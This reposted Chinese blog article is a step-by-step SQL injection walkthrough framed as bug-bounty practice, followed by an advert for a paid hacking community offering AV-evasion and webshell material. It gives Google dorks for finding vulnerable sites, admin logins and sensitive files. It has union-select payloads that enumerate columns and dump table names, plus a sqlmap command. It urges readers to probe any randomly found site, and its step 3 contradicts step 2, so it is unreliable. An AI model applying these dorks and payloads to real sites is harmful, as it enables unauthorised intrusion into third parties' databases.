公益SRC实战 | SQL注入漏洞攻略
2023-11-15 22:59:8 Author: 渗透安全团队(查看原文) 阅读量:9 收藏

一信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

二实战演示

1.谷歌语法搜索
inurl:php id=62

随便点进一个带有id传参=62的网站,大概率存在SQL注入

2.判断是否存在SQL注入漏洞,显示页面正常
id=62 and 1=1


3.id=62 and 1=1显示页面不正常,已经肯定存在SQL注入

4.查找列数
id=62 order by 10
发现列数是10

5.查看回显点
id=111111 union select 1,2,3,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

6.输出表名
id=111111 union select 1,2,3,4,5,6,table_name,8,9,10 from information_schema.tables where table_schema=database() limit 0,1-- qwe

三使用sqlmap进行验证

使用sqlmap命令查看库名
sqlmap.py -u url --dbs

四总结

谷歌语法找到注入点
2.判断注入是否存在
3.查找列数
4.查找表名
5.使用sqlmap进行验证
第一次投稿,觉得这次实战记录很适合新手小白挖SRC,希望多多支持


  1. 付费圈子
  2. 欢 迎 加 入 星 球 !

    代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

    进成员内部群

    星球的最近主题和星球内部工具一些展示

    加入安全交流群

                                   

    关 注 有 礼

    关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

     还在等什么?赶紧点击下方名片关注学习吧!


    干货|史上最全一句话木马

    干货 | CS绕过vultr特征检测修改算法

    实战 | 用中国人写的红队服务器搞一次内网穿透练习

    实战 | 渗透某培训平台经历

    实战 | 一次曲折的钓鱼溯源反制

    免责声明
    由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
    好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247512008&idx=2&sn=85151897a816384d8d87c7b44c1c1332&chksm=c1765267f601db717231964c0c5e444a89367815f217afb41061f394f2b0c1b0e0b956d1384e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh